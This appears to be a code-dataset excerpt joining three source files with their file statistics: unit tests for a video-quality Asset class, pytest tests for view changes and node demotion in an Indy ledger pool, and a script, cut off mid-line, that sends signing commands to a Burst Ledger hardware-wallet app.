asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'start_frame':2, 'end_frame':2})
self.assertEquals(
str(asset),
"test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_720x480"
)
expected_repr = '{"asset_dict": {"end_frame": 2, "height": 480, "start_frame": 2, "width": 720}, "asset_id": 0, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
self.assertEquals(repr(asset), expected_repr)
recon_asset = Asset.from_repr(expected_repr)
self.assertEquals(asset, recon_asset)
self.assertTrue(asset == recon_asset)
self.assertFalse(asset != recon_asset)
self.assertEquals(asset.to_normalized_repr(), expected_repr)
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,})
self.assertEquals(
str(asset),
"test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
)
expected_repr = '{"asset_dict": {"height": 480, "width": 720}, "asset_id": 1, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
self.assertEquals(repr(asset), expected_repr)
recon_asset = Asset.from_repr(expected_repr)
self.assertEquals(asset, recon_asset)
asset = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080})
self.assertEquals(
str(asset),
"test_0_2_refvideo_720x480_vs_disvideo_720x480_q_1920x1080"
)
expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "width": 720}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
self.assertEquals(repr(asset), expected_repr)
recon_asset = Asset.from_repr(expected_repr)
self.assertEquals(asset, recon_asset)
asset = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080,
'yuv_type':'yuv422p'})
self.assertEquals(
str(asset),
"test_0_2_refvideo_720x480_yuv422p_vs_disvideo_720x480_yuv422p_q_1920x1080"
)
expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "width": 720, "yuv_type": "yuv422p"}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
self.assertEquals(repr(asset), expected_repr)
recon_asset = Asset.from_repr(expected_repr)
self.assertEquals(asset, recon_asset)
asset = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080,
'resampling_type':'lanczos'})
self.assertEquals(
str(asset),
"test_0_2_refvideo_720x480_vs_disvideo_720x480_q_1920x1080_lanczos"
)
expected_repr = '{"asset_dict": {"height": 480, "quality_height": 1080, "quality_width": 1920, "resampling_type": "lanczos", "width": 720}, "asset_id": 2, "content_id": 0, "dataset": "test", "dis_path": "disvideo.yuv", "ref_path": "refvideo.yuv", "workdir": ""}'
self.assertEquals(repr(asset), expected_repr)
recon_asset = Asset.from_repr(expected_repr)
self.assertEquals(asset, recon_asset)
def test_str(self):
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':480})
self.assertEquals(
str(asset),
"test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
)
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'resampling_type':'lanczos'})
self.assertEquals(
str(asset),
"test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
)
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':480,
'resampling_type':'lanczos'})
self.assertEquals(
str(asset),
"test_0_1_refvideo_720x480_vs_disvideo_720x480_q_720x480"
)
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'ref_width':720, 'ref_height':480,
'dis_width':1920, 'dis_height':1080,
'quality_width':720, 'quality_height':480,
'resampling_type':'lanczos'})
self.assertEquals(
str(asset),
"test_0_1_refvideo_720x480_vs_disvideo_1920x1080_q_720x480_lanczos"
)
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'ref_width':1920, 'ref_height':1080,
'dis_width':720, 'dis_height':480,
'quality_width':720, 'quality_height':480,
'resampling_type':'lanczos'})
self.assertEquals(
str(asset),
"test_0_1_refvideo_1920x1080_vs_disvideo_720x480_q_720x480_lanczos"
)
def test_hash_equal(self):
asset1 = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080})
asset2 = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080})
asset3 = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="my/dir/refvideo.yuv", dis_path="my/dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080})
asset4 = Asset(dataset="test", content_id=0, asset_id=2,
ref_path="my/dir/refvideo.yuv", dis_path="my/dir/disvideo.avi",
asset_dict={'width':720, 'height':480,
'quality_width':1920, 'quality_height':1080})
self.assertTrue(asset1 == asset2)
self.assertTrue(asset2 == asset3)
self.assertFalse(asset3 == asset4)
self.assertTrue(hash(asset2) == hash(asset3))
self.assertFalse(hash(asset1) == hash(asset4))
def test_workfile_path(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'start_frame':2, 'end_frame':2,
'quality_width':1920, 'quality_height':1080},
workdir_root="workdir")
expected_ref_workfile_path_re = \
r"^workdir/[a-zA-Z0-9-]+/" \
r"ref_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
expected_dis_workfile_path_re = \
r"^workdir/[a-zA-Z0-9-]+/" \
r"dis_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
self.assertTrue(re.match(expected_ref_workfile_path_re, asset.ref_workfile_path))
self.assertTrue(re.match(expected_dis_workfile_path_re, asset.dis_workfile_path))
def test_yuv_type(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'start_sec':2, 'end_sec': 3})
self.assertEquals(asset.yuv_type, 'yuv420p')
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="", asset_dict={
'fps':24, 'start_sec':2, 'end_sec': 3, 'yuv_type':'yuv444p'})
self.assertEquals(asset.yuv_type, 'yuv444p')
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="", asset_dict={
'fps':24, 'start_sec':2, 'end_sec': 3, 'yuv_type':'yuv444a'})
with self.assertRaises(AssertionError):
print asset.yuv_type
def test_resampling_type(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'start_sec':2, 'end_sec': 3})
self.assertEquals(asset.resampling_type, 'bilinear')
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'start_sec':2, 'end_sec': 3,
'resampling_type':'lanczos'})
self.assertEquals(asset.resampling_type, 'lanczos')
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'fps':24, 'start_sec':2, 'end_sec': 3,
'resampling_type':'bicubic'})
self.assertEquals(asset.resampling_type, 'bicubic')
def test_use_path_as_workpath(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width':720, 'height':480,
'start_frame':2, 'end_frame':2,
'quality_width':1920, 'quality_height':1080},
workdir_root="workdir")
expected_ref_workfile_path_re = \
r"^workdir/[a-zA-Z0-9-]+/" \
r"ref_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
expected_dis_workfile_path_re = \
r"^workdir/[a-zA-Z0-9-]+/" \
r"dis_test_0_0_refvideo_720x480_2to2_vs_disvideo_720x480_2to2_q_1920x1080"
self.assertTrue(re.match(expected_ref_workfile_path_re, asset.ref_workfile_path))
self.assertTrue(re.match(expected_dis_workfile_path_re, asset.dis_workfile_path))
self.assertFalse('use_path_as_workpath' in asset.asset_dict)
asset.use_path_as_workpath = True
self.assertTrue('use_path_as_workpath' in asset.asset_dict)
self.assertTrue(asset.asset_dict['use_path_as_workpath'])
self.assertEquals(asset.ref_workfile_path, 'dir/refvideo.yuv')
self.assertEquals(asset.dis_workfile_path, 'dir/disvideo.yuv')
def test_crop_cmd(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':320,
'yuv_type':'yuv422p',
'crop_cmd':'570:320:3:2'})
self.assertEquals(asset.crop_cmd, '570:320:3:2')
self.assertEquals(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320_crop570:320:3:2")
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':320,
'yuv_type':'yuv422p',})
self.assertTrue(asset.crop_cmd is None)
self.assertEquals(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320")
def test_pad_cmd(self):
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':320,
'yuv_type':'yuv422p',
'pad_cmd':'iw+6:ih+4:3:2'})
self.assertEquals(asset.pad_cmd, 'iw+6:ih+4:3:2')
self.assertEquals(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320_padiw+6:ih+4:3:2")
asset = Asset(dataset="test", content_id=0, asset_id=0,
ref_path="", dis_path="",
asset_dict={'width':720, 'height':480,
'quality_width':720, 'quality_height':320,
'yuv_type':'yuv422p',})
self.assertTrue(asset.pad_cmd is None)
self.assertEquals(str(asset), "test_0_0__720x480_yuv422p_vs__720x480_yuv422p_q_720x320")
if __name__ == '__main__':
unittest.main()
| 51.475751
| 270
| 0.557001
| 2,601
| 22,289
| 4.445598
| 0.053057
| 0.023091
| 0.045836
| 0.091499
| 0.878405
| 0.850904
| 0.815619
| 0.807057
| 0.792182
| 0.776442
| 0
| 0.085294
| 0.307775
| 22,289
| 432
| 271
| 51.594907
| 0.664139
| 0
| 0
| 0.633245
| 0
| 0.013193
| 0.247701
| 0.064965
| 0
| 0
| 0
| 0
| 0.205805
| 0
| null | null | 0
| 0.013193
| null | null | 0.005277
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45e096d91306b60a6d9a456cf52fab516f7431be
| 6,922
|
py
|
Python
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 7
|
2019-03-14T10:52:50.000Z
|
2021-12-03T00:02:15.000Z
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 27
|
2018-10-24T15:28:32.000Z
|
2022-03-29T21:30:35.000Z
|
system/indy-node-tests/test_vc.py
|
devinleighsmith/indy-test-automation
|
32d27c8cf8e233d5e365672358752ae3a8b5bf00
|
[
"Apache-2.0"
] | 22
|
2018-10-03T17:05:23.000Z
|
2021-12-03T00:02:04.000Z
|
import pytest
import logging
import asyncio
from async_generator import async_generator, yield_
from system.utils import *
import logging
logger = logging.getLogger(__name__)
# logger = logging.getLogger(__name__)
# logging.basicConfig(level=0, format='%(asctime)s %(message)s')
@pytest.fixture(scope='function', autouse=True)
@async_generator
async def docker_setup_and_teardown(docker_setup_and_teardown_function):
await yield_()
@pytest.mark.asyncio
async def test_vc_by_restart(
pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
trustee_did, _ = get_default_trustee
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
primary_before, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
p1 = NodeHost(primary_before)
p1.stop_service()
await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_before)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
p1.start_service()
await ensure_pool_is_in_sync(nodes_num=nodes_num)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
@pytest.mark.skip('INDY-2023')
@pytest.mark.asyncio
async def test_vc_by_demotion_primary(
pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
trustee_did, _ = get_default_trustee
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
primary_before, primary_alias, primary_did = await get_primary(pool_handler, wallet_handler, trustee_did)
await eventually(demote_node, pool_handler, wallet_handler, trustee_did, primary_alias, primary_did)
await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_before)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
primary_next, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
await eventually(promote_node, pool_handler, wallet_handler, trustee_did, primary_alias, primary_did)
await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_next)
await ensure_pool_is_in_sync(nodes_num=nodes_num)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=360)
@pytest.mark.asyncio
async def test_vc_by_demotion_last(
pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
_alias = 'Node7'
_did = 'BM8dTooz5uykCbYSAAFwKNkYfT4koomBHsSWHTDtkjhW'
trustee_did, _ = get_default_trustee
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
primary_first, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
await eventually(demote_node, pool_handler, wallet_handler, trustee_did, _alias, _did)
await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_first)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
primary_next, _, _ = await get_primary(pool_handler, wallet_handler, trustee_did)
await eventually(promote_node, pool_handler, wallet_handler, trustee_did, _alias, _did)
await ensure_primary_changed(pool_handler, wallet_handler, trustee_did, primary_next)
await ensure_pool_is_in_sync(nodes_num=nodes_num)
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=360)
@pytest.mark.nodes_num(8)
@pytest.mark.asyncio
async def test_demotion_of_backup_primary_with_restart_with_vc(
pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
R0_PRIMARY_ID = 1
R1_PRIMARY_ID = 2
R2_PRIMARY_ID = 3
hosts = [NodeHost(node_id + 1) for node_id in range(nodes_num)]
trustee_did, _ = get_default_trustee
logger.info("1 Have 8 nodes in the pool, so that primaries are [Node1, Node2, Node3]")
await check_pool_is_functional(pool_handler, wallet_handler, trustee_did)
pool_info = get_pool_info(str(R0_PRIMARY_ID))
logger.info("2 Demote primary for replica 2")
primary_r2_alias = get_node_alias(R2_PRIMARY_ID)
primary_r2_did = get_node_did(primary_r2_alias, pool_info=pool_info)
await eventually(
demote_node, pool_handler, wallet_handler, trustee_did, primary_r2_alias, primary_r2_did
)
logger.info("3 Wait for view change")
# TODO timeouts
logger.info('Primary before: {}'.format(R0_PRIMARY_ID))
primary_after = await ensure_primary_changed(
pool_handler, wallet_handler, trustee_did, str(R0_PRIMARY_ID)
)
logger.info('Primary after: {}'.format(primary_after))
logger.info("4 Order 1 more txn")
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did)
logger.info("5 Restart the whole pool")
restart_pool(hosts)
logger.info("6 Make sure that the pool restarted correctly, and can order txns")
logger.info("6.1 ensure that pool is in sync")
# TODO timeouts
await ensure_pool_is_in_sync(node_ids=[h.id for h in hosts if h.id != R2_PRIMARY_ID])
logger.info("6.2 ensure that pool orders requests")
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=60)
@pytest.mark.nodes_num(8)
@pytest.mark.asyncio
async def test_demotion_of_backup_primary_with_restart_without_vc(
pool_handler, wallet_handler, get_default_trustee, nodes_num, check_no_failures_fixture
):
R0_PRIMARY_ID = 1
R1_PRIMARY_ID = 2
R2_PRIMARY_ID = 3
hosts = [NodeHost(node_id + 1) for node_id in range(nodes_num)]
trustee_did, _ = get_default_trustee
logger.info("1 Have 8 nodes in the pool, so that primaries are [Node1, Node2, Node3]")
await check_pool_is_functional(pool_handler, wallet_handler, trustee_did)
logger.info("2 Stop Node2 to delay the view change to viewNo=1")
pool_info = get_pool_info(str(R0_PRIMARY_ID))
host2 = hosts[R1_PRIMARY_ID - 1]
host2.stop_service()
logger.info("3 Demote Node3: it will trigger a view change to viewNo=1")
# which in turn will trigger a view change timeout since Node2 (the next primary) has been stopped
primary_r2_alias = get_node_alias(R2_PRIMARY_ID)
primary_r2_did = get_node_did(primary_r2_alias, pool_info=pool_info)
await eventually(
demote_node, pool_handler, wallet_handler, trustee_did, primary_r2_alias, primary_r2_did
)
logger.info("4 Restart the whole pool right after Demote NODE txn is written on all nodes")
restart_pool(hosts)
logger.info("5 Make sure that the pool restarted correctly, and can order txns")
logger.info("5.1 ensure that pool is in sync")
# TODO timeouts
await ensure_pool_is_in_sync(node_ids=[h.id for h in hosts if h.id != R2_PRIMARY_ID])
logger.info("5.2 ensure that pool orders requests")
await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=60)
| 41.202381
| 109
| 0.779399
| 1,018
| 6,922
| 4.899804
| 0.144401
| 0.079391
| 0.122694
| 0.173216
| 0.825982
| 0.795309
| 0.788492
| 0.78769
| 0.781075
| 0.74158
| 0
| 0.0159
| 0.145912
| 6,922
| 167
| 110
| 41.449102
| 0.827808
| 0.034383
| 0
| 0.586777
| 0
| 0
| 0.117268
| 0.00659
| 0
| 0
| 0
| 0.005988
| 0
| 1
| 0
| false
| 0
| 0.049587
| 0
| 0.049587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64056be035ca02963a80ec789e08168e7ca33304
| 11,661
|
py
|
Python
|
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | 5
|
2020-05-18T17:46:36.000Z
|
2020-05-22T13:34:00.000Z
|
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | 3
|
2020-07-08T09:52:00.000Z
|
2021-07-07T17:10:39.000Z
|
from ledgerblue.comm import getDongle
from ledgerblue.commException import CommException
# from secp256k1 import PublicKey
import binascii
import codecs
dongle = getDongle(True)
CLA = "80"
# Derivation path, header of 44'/30' used on the App
ACCOUNT = "00"
CHANGE = "00"
INDEX = "01"
P1 = "00"
P2 = "00"
# Instructions accepted by the Burst Ledger App
INS_GET_VERSION = "01"
INS_AUTH_SIGN_TXN = "03"
INS_ENCRYPT_DECRYPT_MSG = "04"
INS_SHOW_ADDRESS = "05"
INS_GET_PUBLIC_KEY = "06"
INS = INS_GET_VERSION
LEN = "00"
DATA = ""
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("version ", binascii.hexlify(ret))
INS = INS_GET_PUBLIC_KEY
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("publicKey ", binascii.hexlify(ret[1:1+32]))
# Show the address for the given index, blocks for user input (wait for an accept)
INS = INS_SHOW_ADDRESS
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
# An ordinary payment transaction
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0010b40ad80ae803c980cdc2fded5c1d402fc37eb46eee66706574f037469d47da14f9d7df53f834b6592e05e1c7d3a900e1f505000000008096980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005191020085834c122c1c5665"
LEN = "b0" # 176
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token transfer transaction
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0211223fd80ae80334a7ca8bbded4e3f24c60ecb655f9235ac1b12d97aea698c554df8bf1d950f2db6592e05e1c7d3a900000000000000008096980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008a9102008981c4210120df530151a4f5468b89f5faa00f000000000000"
LEN = "c1" # 193
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token transfer transaction (TRT)
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0211e405d90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed49d84228d09c9f7e2d0000000000000000b0dfc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009a7b0b0025241b746d4b92e2018409fe8f2e3b1eace803000000000000"
LEN = "c1" # 193
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token buy offer (TRT)
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "02130609d90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed4900000000000000000000000000000000209586000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a27b0b00add44456cab796a4018409fe8f2e3b1eac50c3000000000000c409000000000000"
LEN = "c9" # 201
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token cancel offer
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0215840cd90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed4900000000000000000000000000000000209586000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a47b0b0065491ec2c52052c7019567ff4148b62b98"
LEN = "b9" # 185
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Register a contract total length is 2598 (a26 in hex), send the first 176 bytes and later the remaining length
DATA_CONTRACT = "1610537eda0aa0050f60494941ed795b7296174a58dd9946eda87c07fe29cd16a561ab72429a5d010000000000000000000000000000000030fab1050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e8930200aa466d324c0de0a101054254444558210042544445582073656c6c20636f6e74726163742031353839383133373436333933020000000a00010001000100002d3101000000001d0901170000001800000000000000320b0335040116000000303304030c0000003500010d0000001e0d00000007283507030c000000320a033504010f0000003506030e0000003209033504011300000001100000003587d5c34408df950710000000130000001e1000000010120f0100001a1800000001100000002b665d12e76b8b940710000000130000001e100000001e350501180000003506011a00000012fa0100001a18000000011000000031276f22f01aad700710000000130000001e100000001e350501180000003506011a000000127d0300001a180000000110000000b00e004992c79bd80710000000130000001e10000000173505011800000012b60700001a180000001a1800000002100000000600000007100000000f0000001b100000000b1af901000001110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1af90100000210000000050000000610000000040000001010000000101600000011100000001111000000331601100000003302041100000002100000000500000007100000000700000010100000001111000000331601060000003302041100000003110000001011000000110600000003110000001011000000110300000033160100000000320304130111000000010000000000000010110000001111000000021000000003000000071000000011000000101000000011100000001b100000000b1a4d0300000211000000170000000e100000001100000010100000001111000000021000000005000000071000000011000000101000000011100000001b100000000b1a4d030000021100000017000000041100000004110000000e100000001100000010100000001111000000021000000004000000071000000011000000101000000011100000001b100000000b1a4d030000021100000017000000041100000004110000000e100000001100000010100000000211000000170000000e10000000110000001010000000111100000011100000000610000000110000001010000000111100000002100000000e0000000710000000110000001010000000111000000003110000002010000000110000000f1a5c0300003316010f0000003302040e00000013011100000020000000000000001011000000110300000002060000000f0000001301110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1a570400001016000000111000000007100000000f0000001b100000000b1a570400000211000000170000000e100000001100000010100000001108000000021100000017000000041100000004110000000e10000000110000001010000000110900000001110000000002000000000000101100000011110000000210000000030000000a10000000110000001010000000110300000001110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1a3005000002100000000600000007100000000f0000001b100000000b1a300500000211000000170000000e10000000110000001010000000110a000000021100000017000000041100000004110000000e10000000110000001010000000110b00000001110000000004000000000000101100000011110000000210000000030000000a10000000110000001010000000110300000001110000000001000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1ab105000002100000000100000007100000000f0000001e100000000b1a6706000002100000000200000007100000000f0000001e100000000b1a6706000001110000000006000000000000101100000011110000000210000000030000000b1000000011000000101000000001110000000006000000000000101100000011110000001110000000071000000011000000101000000011100000001b100000000b1ab507000002100000000800000007100000000a000000101000000011100000001b100000000b1ab507000002100000000900000007100000000b000000101000000011100000001b100000000b1ab50700000211000000170000000e10000000110000001010000000021100000017000000041100000004110000000e1000000011000000101000000011110000001110000000061000000011000000101000000002100000000400000006100000000500000010100000001110000000061000000005000000101000000011100000000710000000070000001010000000111100000011100000000710000000110000001010000000111000000003110000002010000000110000000f1a8d0700000211000000170000000e100000001100000010100000001016000000111000000011110000003316011000000033020411000000021100000017000000041100000004110000000e100000001100000010100000001111000000331601060000003302041100000003110000001011000000110600000003110000001011000000110300000033160100000000320304131016000000111000000007100000000f0000001b100000000b1a1c09000001110000001000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002010000000110000000f1a1c0900000211000000170000000e10000000110000001010000000110400000001110000000100000000000000101100000011030000000211000000170000000e100000001100000010100000000311000000101100000011110000001110000000071000000011000000101000000011100000001b100000000b1ac50800000311000000101100000011050000000311000000101100000011030000001016000000331601160000003203041335000410000000101000000011050000000211000000170000000e10000000110000001010000000011100000090010000000000001011000000111100000011100000000910000000110000001010000000110700000013180e640300000000002b308f6b8f15f951a23677e9ce2322cf"
print ((len(DATA_CONTRACT)))
INS = INS_AUTH_SIGN_TXN
P1 = "01" # sign init
LEN = "ff" # 255
DATA = DATA_CONTRACT[0:255*2]
